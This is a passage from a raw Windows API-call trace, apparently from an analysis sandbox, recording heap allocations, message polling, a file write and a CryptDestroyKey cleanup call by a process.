Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.667] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0222.667] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0222.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0222.667] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.667] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.667] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.667] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.667] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0222.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.714] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.714] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0222.715] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24820*, nNumberOfBytesToWrite=0x8348, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24820*, lpNumberOfBytesWritten=0x8cf5e4*=0x8348, lpOverlapped=0x0) returned 1 [0222.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.718] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.718] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0222.718] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.718] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51250, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0222.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.719] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0222.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0222.720] CryptDestroyKey (hKey=0xa87710) returned 1 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.722] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.723] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.723] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0222.723] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0222.723] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0222.725] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.725] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.725] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0222.725] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0222.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0222.726] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0222.726] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.726] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0222.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0222.726] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0222.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0222.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0222.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0222.727] 